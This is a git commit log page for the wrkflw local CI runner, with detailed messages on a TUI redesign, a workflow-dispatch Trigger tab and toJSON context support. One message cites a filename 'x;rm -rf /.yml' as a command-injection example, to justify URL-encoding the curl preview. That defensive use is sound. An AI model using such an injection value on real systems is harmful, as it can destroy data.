wrkflw

mirror of https://github.com/bahdotsh/wrkflw.git synced 2026-05-18 05:05:35 +02:00

Author	SHA1	Message	Date
bahdotsh	5ac563d213	Release 0.8.0 wrkflw@0.8.0 wrkflw-evaluator@0.8.0 wrkflw-executor@0.8.0 wrkflw-github@0.8.0 wrkflw-gitlab@0.8.0 wrkflw-logging@0.8.0 wrkflw-matrix@0.8.0 wrkflw-models@0.8.0 wrkflw-parser@0.8.0 wrkflw-runtime@0.8.0 wrkflw-secrets@0.8.0 wrkflw-trigger-filter@0.8.0 wrkflw-ui@0.8.0 wrkflw-utils@0.8.0 wrkflw-validators@0.8.0 wrkflw-watcher@0.8.0 Generated by cargo-workspaces	2026-04-22 00:22:41 +05:30
Gokul	4a3c5b2e73	docs: catch up on everything that landed after v0.7.3 (#107 ) v0.7.3 was tagged back in August and then roughly fifty commits happened. The docs, predictably, noticed none of this. The README still advertised four TUI tabs when the TUI now has seven, still listed three runtime modes when there are four, still declared artifacts/cache/reusable-workflow outputs as "Not Supported" when all three shipped in #88 and #94, and never mentioned `wrkflw watch` or the `--event` / `--diff` / `--changed-files` flags at all. `wrkflw-trigger-filter` and `wrkflw-watcher` existed in the workspace without READMEs. Two of the Rust examples referenced a `runtime` field on `ExecutionConfig` that is actually called `runtime_type`, and printed a `summary_status` field that doesn't exist. One `run_wrkflw_tui` example was missing an argument. That kind of thing. While at it, BREAKING_CHANGES.md was labeling three entries as "(v0.7.3)" when the underlying commits all landed after the v0.7.3 tag — so calling them part of that release was, let's say, a work of fiction. Relabel as "(Unreleased)" with a note up top pointing at the next release. New trigger-filter and watcher READMEs are deliberately short — most users should hit that code through the CLI flags, not by depending on the crates directly. No point padding them. Nothing here is a code change. Just the docs finally telling the truth about what's in the tree.	2026-04-21 23:43:11 +05:30
Gokul	ebe8083f33	feat(ui): ship screens 4, 7, 8 and the Tweaks overlay (#105 ) * feat(ui): ship screens 4, 7, 8 and the Tweaks overlay PR #104 landed three screens from the Claude Design handoff (Dashboard, Live Run, Step Inspector) and deliberately punted the rest because "a UI without backing data is worse than no UI." Fair. Picked up the remaining screens that actually have backing data today, and left the one that doesn't alone. Three new top-level tabs: - DAG (tab 3) — full topological view of the selected workflow, `g` toggles between the spatial column layout and a stage-list layout. Reuses the existing `dag::topo_levels` so what you see here is exactly what the mini-DAG in the Execution tab shows, just bigger. - Trigger (tab 5) — form + live curl preview, dispatches through `wrkflw_github::trigger_workflow` or `wrkflw_gitlab::trigger_pipeline`. `p` flips platform, `+` adds a k=v input, `Tab` walks fields, `Enter` dispatches, `c` dumps the curl into the log buffer because integrating with every terminal's clipboard is not a fight I want to pick today. - Secrets (tab 6) — reads SecretConfig::default(), shows the providers the user actually has wired, detail pane with `m` to toggle the value mask. Runtime pills on the side share state with the existing runtime cycler. We do not render a list of individual secret keys; SecretManager doesn't expose a list_known_keys() and I refuse to fake one. Step Inspector's Matrix sub-tab now calls wrkflw_matrix::expand_matrix and renders up to 32 combos with an overflow badge. Status glyph inherits from the parent job because per-combo status isn't tracked end-to-end yet — a future executor change to surface it will drop straight into this render. Tweaks overlay (`,` key) ports the design's floating TweaksPanel. Only one knob: accent color, five slots matching the design palette. theme::set_accent_override plumbs the chosen color into a thread-local the brand mark and focused borders consult every frame. Dropped theme (dark/light) and density from the panel because they'd be dead toggles today — the rule is the rule. What's still not in: screen 6 (Run history + diff). That one needs a storage layer we don't have — no run persistence, no serialized run records, no diff engine. Building a UI on top of nothing would be exactly the thing PR #104 warned against. Left for a separate PR that starts from storage. Verified: cargo build --workspace, cargo clippy --workspace --all-targets -- -D warnings, cargo test --workspace (734 tests, all green), cargo test -p wrkflw-ui (25/25). Clean. * docs(examples): add ui-demo workflow set for the new screens The new UI (screens 4, 7, 8 + Tweaks) shipped without a dedicated set of workflows to poke at it. The existing tests/workflows/ fixtures are fine for the parser, but they don't have the shapes you actually want to eyeball — there's no clean diamond, no wide multi-stage fan-out, no workflow_dispatch with a mix of input types. So you end up firing up the TUI and squinting at whatever happens to be checked in. Not great. Add examples/ui-demo/ with one workflow per screen/feature: a diamond and a wide fan-out DAG for screen 4, a workflow_dispatch with choice / string / bool inputs for screen 8, a matrix with include/exclude plus three scopes of env for the Step Inspector, a secrets + services + container job for screen 7, a multi-event trigger for the `d` diff filter, and a mixed-status workflow so the status badges aren't stuck on all-green. Every file carries a header comment explaining which screen it targets and what to look at. All eight parse clean under `wrkflw validate`. * fix(ui): clean up loose ends around the new tabs and Tweaks overlay The DAG / Trigger / Secrets tabs and the Tweaks overlay shipped with the edges unfinished. A review turned up a pile of correctness and consistency bugs that individually didn't look like much but together amounted to "the tabs work but everything around them lies." The status bar's context_hints still only knew about the old 4-tab layout — tab 2 was now DAG but showed Logs hints, tab 3 was Logs but showed Help hints, tabs 4-6 went blank. The Help overlay still said "1-4 / w,x,l,h" and listed four tabs. Every keyboard-help surface was advertising the wrong layout. The Tweaks overlay's doc comment claimed it was modal — "the overlay wins" — but the match arm only handled Esc / \`,\` / \`a\`/\`A\`. Everything else (q, d, 1-7, ?) fell through to the global handler. The comment was aspirational. The code was not. trigger_dispatch had no in-flight guard. Hit Enter twice quickly, fire two workflow_dispatch requests. Against real repos. This is the kind of "oops we double-ran the deploy" bug that nobody enjoys. render_target_pane called resolve_target on every frame, which shelled out to \`git remote get-url origin\` + \`git symbolic-ref\` +/- \`git rev-parse\` on every frame. The event loop polls at 50ms, so sitting on the Trigger tab produced ~40-60 git subprocesses per second. Per second. And the DAG tab cheerfully printed fabricated column labels — ["setup", "lint", "build", "test/docs", …] — positionally assigned to topological levels, with no relationship to actual workflow content. A release pipeline's third layer would read "build" even when it was \`deploy\`. Exactly the "UI without backing data" footgun the previous PR was supposed to avoid. The fix is mechanical: - Rewrite status_bar hints and the Help overlay for 7 tabs. - Make the Tweaks overlay actually modal — unmatched keys \`continue\` instead of falling through. - Add a trigger_in_flight AtomicBool; set before spawn, cleared by the spawned task regardless of outcome. - Cache the resolved target on App; invalidate on platform toggle. No more subprocess storm. - Replace the hand-rolled JSON escaper with serde_json, which has been in the tree the whole time. While at it, shell-escape the GitHub ref and double-quote-escape the GitLab k/v pairs so the curl preview is copy-paste safe. - Drop the fabricated stage labels; print "stage N" because that's the honest thing. - Sort the include-only matrix column tail so HashMap order can't cause visual jitter between frames. - switch_tab re-masks secrets when leaving the Secrets tab. The doc had claimed this all along; now it's actually true. - Empty env vars no longer count as a set auth token. - trigger_input_cursor is Option<usize>, not a usize::MAX sentinel. Please don't use usize::MAX for "not set" when Option exists. Sixteen new unit tests cover the new helpers and edge cases. Full workspace build + clippy -D warnings + test suite clean. * fix(ui): stop the Trigger tab from smearing the TUI on dispatch The Trigger tab shipped in the previous commit calls into wrkflw_github::trigger_workflow and wrkflw_gitlab::trigger_pipeline from a tokio::spawn. Both of those are happily scattering println! and eprintln! calls — "Repository: x/y", "Using branch: main", "Workflow triggered successfully!", you name it — straight to the stdout that ratatui is rendering into. The TUI owns the terminal. The SDK crates write to it anyway. The result is a frame full of garbled half-redrawn panels the moment the user hits Enter. wrkflw_logging::set_quiet_mode(true) is already being armed at TUI start, but it only gates the logging subsystem — raw println! skips right past it. Route every one of those prints through wrkflw_logging::{info,warning} so the quiet-mode flag actually does the thing it says on the tin. Adds wrkflw-logging as a dep to both crates, which is fine — it's where those messages belonged in the first place. While at it, fix the rest of what was broken around the Trigger tab: The GitLab curl preview was cheerfully lying. It pointed users at /trigger/pipeline with a PRIVATE-TOKEN header, which is a combination that has never worked — /trigger/pipeline wants a trigger token, and the real dispatcher calls /pipeline with a JSON body. Copy-paste the preview and you'd get a 401, maybe a 404. Rebuilt both previews off the same request shape the dispatcher actually sends. GitHub and GitLab bodies are now built via serde_json end-to-end (github_dispatches_body, gitlab_pipeline_body), shell-escaped with a single helper, and the URL uses the resolved repo from the target cache instead of <owner>/<repo> / <id> placeholders. The dispatch outcome used to reach the user only via the Logs tab — the one on Trigger heard nothing back. Added a mpsc channel so the spawned task reports success/failure back to the main event loop, which mirrors it onto the status bar. Drain runs once per tick next to the existing execution-result drain. The DAG graph view was splitting the area into equal-ratio columns with no floor, so on anything narrower than 18 * stages cells the box-drawing characters wrapped and the whole graph looked like someone spilled coffee on it. Clamped columns to a fixed 18-cell width, render "+N more stages" in the overflow slot, and nudge users toward g for list view. Dropped the duplicated "L1 stage 1" header while I was in there. AccentScope wraps the thread-local accent override in an RAII guard so it lives for exactly one frame. A thread-local that nobody ever clears is a booby trap for whoever adds the second theme knob. The old trigger-dispatch test spawned a real tokio task that called the real wrkflw_github::trigger_workflow. If GITHUB_TOKEN happened to be set in the environment — hello, CI — it would fire a real workflow_dispatch against whatever repo git remote resolved to. That is not a test. Replaced with a synchronous guard test that pre-arms the in-flight flag and asserts rejection. No spawn, no runtime, no network. New tests cover the preview bodies, split_slug, and the outcome-drain mapping. * fix(ui): sand off the UX edges flagged in the screens-4-8 review A review pass over the new DAG / Trigger / Secrets / Tweaks tabs turned up a small but consistent failure mode: several bits of the UI were quietly lying to the user, and a couple of input paths were eating keystrokes that mattered. The Secrets tab's header badge advertised "providers configured", but the tab reads `SecretConfig::default()` unconditionally — no real config file is loaded yet. A user who had carefully customised their secrets config would see the two hard-coded defaults and a badge telling them everything was wired up. That's exactly the "UI without backing data" footgun PR #104 set out to ban. Rename the badge to "default providers" and update the file header so the caveat doesn't get lost the next time someone skims the module. The Trigger tab's edit-mode key handler returned `false` for Up / Down / Left / Right, which meant directional keys fell through to the global handler and called `trigger_tab_prev/next_workflow`. So a user typing `env=prod` who hit ↓ to correct the row above had the workflow about to be dispatched silently changed underneath them. Consume the arrows in edit mode — no-op for now; a future enhancement can route them to prev/next field if we want that. `resolve_trigger_target`'s error branch admitted the repo was `<unresolved>` while cheerfully inventing `default_branch: "main"`. Two fields, two voices, one warn badge the user might or might not notice. Mark the branch `<unresolved>` too so the un-resolution story is consistent. The dispatcher has its own `get_repo_info` call in the hot path, so this is strictly a display-honesty fix. The Tweaks overlay was modal to the point of swallowing `q`. Quit is universally modal-safe in this TUI; silently eating it is a discoverability trap. Let it through. While at it, `field_row_hl` was taking `hint: String` where the sibling `field_row` took `&str`. Match the sibling. Tiny thing, but the kind of inconsistency that compounds. Two regression tests pinned to the arrow-swallow path and the resolve-error shape, so a future refactor can't quietly re-open either footgun. * fix(ui): clear out the self-review pile for screens 4-8 A review of the new DAG / Trigger / Secrets tabs and the Tweaks overlay turned up a depressingly long list of "works in the happy path, lies to the user otherwise" bugs. Dealing with them in one sweep rather than trickling out a dozen one-liner fixes. The headliner: the Trigger tab renders a "Branch / ref" row as if it's editable, but no keystroke ever wrote into `trigger_branch`. The dispatcher and the curl preview both honoured the field — the field just had no input path. A user wanting anything other than the git-resolved default was out of luck. Add a `b` shortcut to focus the branch row, extend `trigger_handle_input_key` to route into `self.trigger_branch` when focused, and rework `trigger_tab_next_field` so Tab cycles Branch → Input(0).key → Input(0).value → … → wrap. Three tests pin the edit path, the Esc-clears-override path, and the mutual exclusion between branch edit and input edit. `state_for_job` in the DAG tab was using `std::ptr::eq` against `app.workflows` elements to figure out which workflow was the current execution, with `usize::MAX` as the fallback. It worked today because the render path gets its `&Workflow` from the same Vec, but it was one refactor away from returning `Some(usize::MAX)` and silently matching against `app.current_execution`. Thread the index the caller already has and compare that. No more pointer identity. The Secrets tab's "reveal / mask" toggle was theatre. There are no actual secret values at this layer — the "value" being masked was the provider's source descriptor, i.e. a filesystem path or an env-var prefix. Bullet-masking a filename protects nothing and teaches the user that "masking" means something it doesn't. Rip out `secrets_reveal`, the `m` handler, and the `switch_tab` auto-revert. When per-secret values land the toggle can come back attached to something it can legitimately hide. The Trigger tab's curl preview was building a `format!` string with Rust's backslash-newline line continuation (which strips the backslash) and then splitting the result on `" \\"`. That split never matched anything, so the preview rendered as one long line relying on terminal wrap. Rebuild with explicit ` \\\n` joins and split on `\n` at render time. `format_yaml_scalar`'s fallback runs non-scalar matrix values through `serde_yaml::to_string`, which for sequences and maps returns multi-line YAML. That got shoved into a single ratatui Span. Collapse embedded newlines to a visible ` · ` separator. `drain_trigger_outcomes` overwrote `status_message` on every iteration — if two outcomes arrived in the same tick (rare, but the in-flight guard could relax later) the first was silently lost. Log each drained outcome to `self.logs` as the durable record, and have the status bar prefer errors over later successes in the same drain. Tab indices: stop pretending `2, 3, 4, 5, 6` are self-documenting. Introduce `TAB_WORKFLOWS` / `TAB_EXECUTION` / … constants next to `TAB_LABELS` and use them everywhere. `switch_tab` used to define a local `SECRETS_TAB = 5` that the rest of the file promptly ignored. Please don't do that. While at it, widen the accent override plumb-through. The Tweaks panel claimed to recolour the UI but only `block_focused` and the title_bar brand were actually consulting `current_accent()` — the other 14 `COLORS.accent` call sites stayed on the static palette. A user flipping accent saw the focused borders change and nothing else, which looks broken. Point all accent readers at the thread-local override. Minor: hoist \`provider_entries()\` to one call per frame (was 3×), dedupe the \`truncate(name, 12)\` call in the DAG graph (was computed twice per node). cargo fmt + clippy -D warnings clean; 48/48 UI tests green. * fix(ui): close the screens-4-8 review debt A review pass over the screens-4-8 branch turned up three things that the earlier "done" sweep in `09da60a` should have caught. Dealt with them in one commit rather than three. The accent plumb-through was overstated. `09da60a` claimed all accent readers went through the thread-local override, but `BadgeKind::Accent` still resolved to `COLORS.accent`, `brand_style`/`label_style` were dead but still reaching for the static palette, and `progress_bar`'s default was hardcoded cyan. A user flipping to Amber saw focused borders change and the "d Toggle diff filter" chip stay exactly the same — the same "feature lies about what it does" failure mode the review was trying to plug. Route the badge variant through `current_accent()`, delete the two dead helpers, and switch the progress bar default over. The curl preview was shell-escaping the JSON body but interpolating owner/repo/workflow-name raw into the URL path. Those three come from `git remote` + the local filesystem — nothing stops a workflow filename like `x;rm -rf /.yml` from producing a copy-paste line that does exactly what it says on the tin. Pipe every path segment through `urlencoding::encode`. Not a high-probability hazard, but the preview is explicitly there to be copy-pasted, so unquoted user input is an unforced error. Same `09da60a` commit introduced TAB_WORKFLOWS..TAB_HELP as canonical indices and swept the codebase — except for `status_bar::context_hints`, which was still matching bare 0..6. Port it. Please don't use a bare integer for a tab index when the constant is right there. While at it: `trigger_tab_copy_curl` was pushing a multi-line curl string as one log entry (embedded newlines, rendered garbled); successful dispatches now set a Success (green) status message instead of Info (cyan) so they're visually distinct from the "queued" messages that share the Trigger tab's accent; renamed a shadowed `truncated` local in `dag_tab` that was doing double duty as both the overflow-stage count and the char-truncated job name. Four new tests pin the curl fallback placeholders, the URL-encoding regression, input-row Enter fallthrough, and AccentScope dropping the thread-local on scope exit. cargo fmt + clippy -D warnings + full workspace test suite clean. * fix(ui): close the remaining review debt on screens 4-8 A review pass over the screens-4-8 branch turned up three things that survived the last round. Dealing with them in one commit. It turns out the curl preview and the real dispatcher were computing the workflow URL segment differently. The preview stripped `.yml`/`.yaml` and url-encoded the full user input — subdir and all. The dispatcher ran `Path::new(name).file_stem()` (which drops the subdir) and then unconditionally re-appended `.yml`, turning a `ci.yaml` workflow into a `ci.yaml.yml` URL that has never worked. So the preview was lying about what Enter would send, the dispatcher had a latent `.yml.yml` bug for any input that already carried the extension, and `.yaml` files silently became `.yml` URLs on dispatch. Consolidate both paths behind a single `wrkflw_github::workflow_dispatch_path_segment` helper. Drops any subdir prefix, preserves an existing `.yml`/`.yaml`, appends `.yml` only when absent. The preview and the dispatcher now produce byte-identical URL segments for the same input — and the `.yaml.yml` footgun is gone as a side effect. The second one: `a` (select-all) and `r` (queue+run) were gated only on `!app.running`, not on the active tab. Pressing `a` on the DAG or Trigger or Secrets tabs — outside edit mode — would silently flip every workflow to `selected` behind the user's back. Same story for `r` queuing an execution. Add the tab gate. Please don't do that. The third one: `trigger_in_flight` was cleared by a trailing `store(false)` at the end of the spawned dispatch task. Fine on normal return. A panic inside reqwest or either SDK would skip right past it, strand the flag at `true`, and lock the Trigger tab into a permanent "already in flight" state until the TUI restarts. Wrap the flag in an `InFlightGuard` RAII so Drop is what actually clears it. Normal return, early return, and unwinding all land it back at `false`. While at it: dropped the `DEBUG: Shift+R pressed` log spam that was sprinkled through the reset handlers, deleted the now-dead `strip_yaml_suffix` helper, and cleaned up a stray `test_edge_cases.rs` debug script that had been sitting in the repo root. Eight new tests across the two crates cover the shared URL helper, the preview/dispatcher identity, \`.yaml\` round-trip, and the in-flight guard on both normal drop and \`catch_unwind\` panic paths. cargo fmt + clippy -D warnings + full workspace test suite clean.	2026-04-21 22:47:50 +05:30
Gokul	1824e73ebd	feat(ui): rebuild TUI to match the new design system (#104 ) * feat(ui): rebuild TUI to match the new design system Phase 1 of the redesign that landed in the Claude Design handoff bundle: Workflows becomes a Dashboard, Execution becomes a 3-pane Live Run, Job detail becomes a tabbed Step Inspector. The visual DNA — palette, status bar, title bar, status badges — now matches the design instead of inheriting whatever your terminal feels like. The old palette used ratatui named colors (Color::Cyan, Color:: Yellow, ...), which means every terminal got a slightly different TUI. Swap to exact RGB straight from the design (#5fd3f3 cyan, #f5d76e yellow, #8fce8f green, #d68cff trigger purple, ...). Same TUI everywhere, at the cost of not respecting per-terminal themes. Fair trade. Layouts: - Title bar: flat 1-row with brand mark, numbered tabs, and a right-side pulsing LIVE indicator + runtime badge. - Status bar: left-aligned [key] chips, right-aligned validation / runtime / availability / workflow count. Key hints stop being one fat string concatenation. - Workflows: 60/40 split. Table on the left grows columns for trigger-match dot and job count. Right column stacks Preview (parsed name / on / jobs / chain / counts), Trigger filter (live match/skip counts), Quick actions (six labelled key tiles). - Execution: 3 panes — Jobs (synthesised from job_names so pending jobs show too, not just executed ones) · Steps + Live output · Mini DAG (topo-laid from Job.needs) + Timing chart. - Job detail: tabbed Step Inspector — Output / Env / Files / Matrix / Timeline. Tab cycles them when in detailed view. Env and Files are honest placeholders because per-step env snapshots and workspace-diff capture don't exist yet in the executor. Faking them looked tempting; I didn't. Workflow now carries an Arc<WorkflowDefinition> populated at load time, so Preview and the mini DAG read real data instead of re-parsing on every frame. App gains a step_inspector_tab: usize plus a Tab handler when detailed_view is true. What's not in this PR: screens 4-8 from the design (DAG full view, Matrix expansion, Run history+diff, Secrets manager, Remote trigger UI) and the Tweaks panel. Those need new feature plumbing in the executor / runtime / storage, not just render work, and a UI without backing data is worse than no UI. Verified: cargo build --workspace, cargo clippy --workspace --all-targets -- -D warnings, cargo test --workspace, cargo test -p wrkflw-ui (25/25). All clean. * style(ui): cargo fmt	2026-04-21 12:28:59 +05:30
Gokul	7b2a27a532	refactor(executor): separate user env from runner env in ExpressionContext (#102 ) * refactor(evaluator): add user_env field to ExpressionContext Prior commits landed bare-context support for toJSON(steps), toJSON(needs), toJSON(github), toJSON(secrets), and toJSON(matrix). toJSON(env) is next — and it's the ugly one. The existing implementation filters env_context through an is_user_env_var() heuristic: "if the key doesn't start with GITHUB_/RUNNER_/INPUT_/ WRKFLW_ and isn't CI or MATRIX_CONTEXT, it must be user-declared." It turns out that's wrong in both directions. A user who writes `env: { GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} }` in their YAML — which is the single most common pattern on planet Earth — gets their token silently dropped from toJSON(env). Meanwhile any new runner var that isn't on the exclusion list leaks in. Key-level guessing can't separate the two populations after they've been merged into one flat map. The fix has to happen at the seam. So: add `user_env: &'a HashMap<String, String>` to ExpressionContext alongside env_context. env_context stays as-is (it's the union, used for dotted `env.FOO` and `github.FOO` lookups); user_env carries only what the user declared, and that's what toJSON(env) reads. This commit is the mechanical half. The field is wired through every construction site, but at each production site in engine.rs we build user_env inline by running the old heuristic against env_context — exactly the behavior we had before, just relocated. Not pretty, but it keeps the tree green and all 399 tests passing while the plumbing lands. Commit 2 replaces these inline filters with a user_env that's tracked properly through the workflow/job/step env merges and the $GITHUB_ENV writes, and deletes is_user_env_var for good. The test helpers (empty_ctx, make_ctx, etc.) dual-populate env_context and user_env from the single env argument, so most tests didn't need touching. Three toJSON(env) tests did — they were stuffing runner vars into the same map as user vars and asserting the heuristic filtered them, which is a thing that can't be expressed anymore. Those now construct ExpressionContext directly with distinct populations. While at it, the test that was literally called tojson_env_excludes_user_var_with_internal_prefix — which asserted the bug as if it were a feature — is inverted and renamed. Please don't write tests that ratify bugs. StepExecutionContext::expr_context() and expr_context_with_env() grew a user_env_buf: &mut HashMap parameter because the returned ExpressionContext has to borrow from somewhere, and self is already borrowing job_env. Callers pass a local buffer. Ugly but localized — and this too goes away in Commit 2 when the struct carries its own user_env field. * refactor(executor): track user_env through layered env merges Commit 1 added the user_env field to ExpressionContext but populated it at each construction site by re-running the same is_user_env_var() heuristic against env_context. That was honest plumbing — it said "here's where the field goes" without actually changing any behavior. Now we replace the heuristic with the thing it was always pretending to be. The real shape is: env_context is still the union used for dotted lookups (env.FOO, github.X). Alongside it we now carry user_env as a parallel HashMap that is strictly what the user declared — nothing more, nothing less. Thread it through JobExecutionContext, MatrixExecutionContext, and StepExecutionContext, populated at the four places where user env actually enters the system: 1. Workflow-level: seeded empty, workflow.env resolved values get mirrored in (with the same or_insert precedence as env_context, so workflow.env doesn't shadow runner vars). 2. Job-level: clone workflow user_env, layer container.env and job.env on top. Runner-internal GITHUB_JOB (via add_job_context) stays in env_context only. 3. Matrix jobs: same as job-level but skip the MATRIX_* vars — they're runner-internal, they belong to the matrix context, not to env. 4. Step-level: clone job user_env, layer step.env on top after expression resolution. And the one that mattered most: GITHUB_ENV writes from steps. apply_step_environment_updates now mirrors env-file writes into user_env too, because a step running 'echo FOO=bar >> GITHUB_ENV' is user-declaring FOO by definition — otherwise a step that writes its own FOO wouldn't see it in the next step's toJSON(env). GITHUB_PATH updates stay out of user_env because PATH is not a user-declared env var. There's a test for this. With real tracking in place, is_user_env_var() is gone, along with its environment.rs test that did nothing but rubber-stamp the heuristic's list of prefixes. StepExecutionContext::expr_context() and expr_context_with_env() lose the ugly user_env_buf: &mut HashMap parameter that Commit 1 used as a bridge — they read self.job_user_env directly now. Two non-obvious scope decisions, both flagged in the code: - Reusable workflows (run_called_workflow) get an empty user_env on entry. Parent workflow.env doesn't leak across reusable-workflow boundaries, and the called workflow's own workflow.env isn't merged into child_env at all (that's a pre-existing gap, not mine to fix here). Job-level env merges still populate user_env correctly downstream. - GitLab pipelines don't carry a workflow-level env:, so the gitlab-path callsite also starts with empty user_env. 398 tests pass, clippy clean, fmt clean. The PR that ships this fixes the original bug: a user who writes their GITHUB_TOKEN via workflow/job/step env: will now actually see it in toJSON(env). Which, let's be honest, they should have been able to see all along.	2026-04-18 23:21:40 +05:30
Gokul	74499d5279	feat(evaluator): make toJSON(matrix) return matrix object (#101 ) It turns out that `toJSON(matrix)` has been returning "null" this whole time — same disease as env, steps, needs, github, and secrets before it. The evaluator had no bare-`matrix` branch in ExpressionContext::resolve, so resolving the identifier fell through to the catch-all `_ => Null` and toJSON dutifully serialised that. Fifth and last in a series after #96/#97/#98/#99 /#100. The fix is the obvious one. `matrix_combination` is already a flat `&Option<HashMap<String, serde_yaml::Value>>` holding exactly the shape real GHA exposes as the `matrix` context for a single combination. Convert each value via the existing `yaml_value_to_expr` helper — the same helper the dotted-access arm already uses — so the bare and dotted forms agree on per-value shape. Wrap the result in ExprValue::Object. Done. One intentional asymmetry with the other bare-context arms: when `matrix_combination` is `None` (non-matrix job), return `Null` instead of an empty Object. `None` encodes "no matrix context exists", which is what real GHA exposes for jobs without a matrix strategy. `Some(empty)` — pathological but possible — still renders as `{}`, preserving the Some-vs-None distinction carried by the field's `Option<...>` type. There's a test pinning each half of that split so any future change is deliberate. Tests mirror the #96–#100 suites: populated matrix, empty combination, None → "null", mixed value types (string/number/ bool preserved natively, not stringified), sorted keys, fromJSON(toJSON(matrix)) round-trip, bare-matrix truthiness in both populated and None states, a regression guard that the bare arm doesn't shadow the existing dotted-access arm, and a YAML-sequence test that pins the current `yaml_value_to_expr` fallback behaviour for non-scalar values. While at it, drop the stale `TODO: support other bare contexts: matrix` comment entirely. No bare contexts remain after this.	2026-04-18 22:38:11 +05:30
Gokul	e4752efa8e	feat(evaluator): make toJSON(secrets) return secrets object (#100 ) It turns out that toJSON(secrets) has been returning "null" this whole time — same disease as env, steps, needs, and github before it. The evaluator had no bare-`secrets` branch in ExpressionContext::resolve, so resolving the identifier fell through to the catch-all `_ => Null` and toJSON dutifully serialised that. Fourth in a series after #96/#97/#98/#99. The fix is the simplest of the bunch. secrets_context is already a flat &HashMap<String, String> holding exactly the shape real GHA exposes as the `secrets` context — no prefix strip, no exclusion list (unlike #99's github arm), no nested outputs sub-object (unlike steps/needs). Clone the entries into ExprValue::String and wrap in ExprValue::Object. Done. Values are returned in plaintext by design. That matches real GHA — `toJSON(secrets)` there is not auto-redacted either, and the common `fromJSON(toJSON(secrets))` pipe-through-an-action pattern depends on the exact original values surviving the round-trip. Masking stays where it belongs: the log boundary, via wrkflw_secrets::SecretMasker, already wired up in engine.rs. Pulling the masker into the evaluator would (a) break the fromJSON round-trip, (b) diverge from GHA semantics, and (c) duplicate a concern that already has one correct home. Please don't do that. Tests mirror the #96–#99 suites: populated secrets, empty context, sorted keys, special-character values (quotes, backslashes, PEM-style newlines), fromJSON(toJSON(secrets)) round-trip, bare-secrets truthiness, a regression guard that the bare arm doesn't shadow the existing dotted-access arm, and a plaintext-values test that pins the no-masking-here decision so any future switch is deliberate rather than silent. While at it, drop `secrets` from the lingering `TODO: support other bare contexts` comment. Only `matrix` remains.	2026-04-18 22:20:55 +05:30
Gokul	bb55e7f30f	feat(evaluator): make toJSON(github) return github object (#99 ) * feat(evaluator): make toJSON(github) return github object It turns out that `toJSON(github)` has been returning `null` this whole time — same disease as `env`, `steps`, and `needs` before it. The evaluator had no bare-`github` branch, so resolving the identifier fell through to the catch-all `_ => Null` and toJSON dutifully serialized that. The fix mirrors the bare-`env` arm added in #96. There's no dedicated `github_context` field — `env_context` is already the source of truth for `GITHUB_` vars, since the dotted-access arm (`github.sha` → `GITHUB_SHA`) reads from there. So the bare case is just the inverse mapping: iterate env_context, filter keys starting with `GITHUB_`, strip the prefix, lowercase, and wrap it as an Object. Still doesn't produce a nested `event` sub-object. That's the same documented limitation as the dotted-access path — real GHA parses `$GITHUB_EVENT_PATH` as a full JSON payload and we approximate it via flat env vars. Not fixing that here; it's a bigger conversation. Add tests for the populated case, empty env, no-GITHUB-prefix, sorted keys, truthiness of bare `github`, a regression guard so this arm doesn't shadow dotted access, special-character values, and a fromJSON(toJSON(github)) round-trip. Third in a series after #96 (env), #97 (steps), #98 (needs). Same pattern. `secrets` and `matrix` still return null — those are next. refactor(evaluator): tighten toJSON(github) after review The toJSON(github) arm that landed in the previous commit had a few rough edges worth fixing while it's still fresh. The .strip_prefix("GITHUB_").unwrap_or(k) was dead-branch defensive code — the preceding .filter(...) already guarantees the prefix, so the fallback path couldn't actually execute. That's the worst kind of defensive code: it obscures intent without doing any work. Replace it with a direct slice. While at it, swap to_lowercase() for to_ascii_lowercase() since env-var keys are ASCII. Add k.len() > PREFIX.len() to the filter so a literal GITHUB_ key doesn't strip-become-empty and emit a {"": "..."} entry. Not because anyone is going to set that, but because silently emitting nonsense is worse than not emitting it. Expand the limitation comment: user-defined env vars with the GITHUB_ prefix (notably the common env: { GITHUB_TOKEN: ... }) will land in the output object, and GITHUB_TOKEN surfaces as github.token in plaintext. No masking layer exists yet. Please don't dump toJSON(github) into untrusted sinks. Two new tests pin the token-leak behavior and the empty-suffix filter so any future change is deliberate. * fix(evaluator): exclude runner-internal keys from toJSON(github) Another round of review on the bare-github arm turned up something worth fixing before this lands. It turns out that environment.rs unconditionally seeds GITHUB_OUTPUT, GITHUB_ENV, GITHUB_PATH, and GITHUB_STEP_SUMMARY into env_context — those are local tempfile paths for the runner's file-based workflow-command protocol. In real GHA they're invisible to expressions; they are not members of the `github` context. The prefix-strip heuristic was happily leaking them out as `github.output`, `github.env`, `github.path`, and `github.step_summary`, pointing at paths inside our temp dir. That's a semantic divergence from real GHA and a minor info leak into any log that dumps toJSON(github). Not great. Add a tiny INTERNAL_KEYS blocklist to the filter and drop them on the floor. While at it, collapse the manual `k.len() > PREFIX.len() && k.starts_with(PREFIX)` + byte-slice dance into a single strip_prefix + filter chain — same behavior, one prefix check instead of two, and no byte-offset slicing that depends on PREFIX being pure ASCII. Two new tests: one pins the internal-keys exclusion, the other locks in the documented GITHUB_FOO contamination case so any future switch to a curated allowlist is a deliberate change, not a silent behavior flip. * fix(evaluator): close the last runner-internal hole in toJSON(github) One more pass on the bare-github arm turned up another runner-only env var quietly slipping past the INTERNAL_KEYS blocklist, plus a small maintenance wart worth cleaning up while we're still close to the code. It turns out that environment.rs also seeds GITHUB_ACTIONS=true unconditionally, for CI-detection. Real GHA documents that one as a default runner env var, not as a property of the `github.` context — there is no `github.actions`. So the previous blocklist, which only caught the workflow-command-protocol tempfile paths (output/env/path/step_summary), was still letting `"actions": "true"` through. Harmless in value, but exactly the same class of shape divergence that `53f3dc6` was meant to close. Add "actions" to the exclusion set so `toJSON(github)` keeps matching real GHA. While at it: the inline INTERNAL_KEYS const + strip_prefix + filter_map chain lived right next to the bare-env arm, which funnels its runner-internal vars through `is_user_env_var` — one crate helper, one place to look. Two parallel exclusion lists in two different scopes, both encoding knowledge about what environment.rs seeds, is exactly how these things drift apart the moment someone adds a new runner var. With `secrets` and `matrix` bare arms coming next, the pattern would only get worse. Pull the whole strip + lowercase + exclusion pipeline into a single helper, `github_context_suffix()`, sitting right next to `is_user_env_var`. Call site becomes a one-liner, the exclusion list lives on the function it's semantically attached to, and future authors have one obvious place to update when a new runner-internal var shows up. Extend the existing runner-internals test to seed GITHUB_ACTIONS and assert it doesn't surface as `github.actions`. style(evaluator): collapse toJSON(github) closure per rustfmt Pure whitespace. Newer rustfmt wants the map() call on one line; pre-fmt version had it split. Not worth arguing with the formatter.	2026-04-18 21:06:05 +05:30
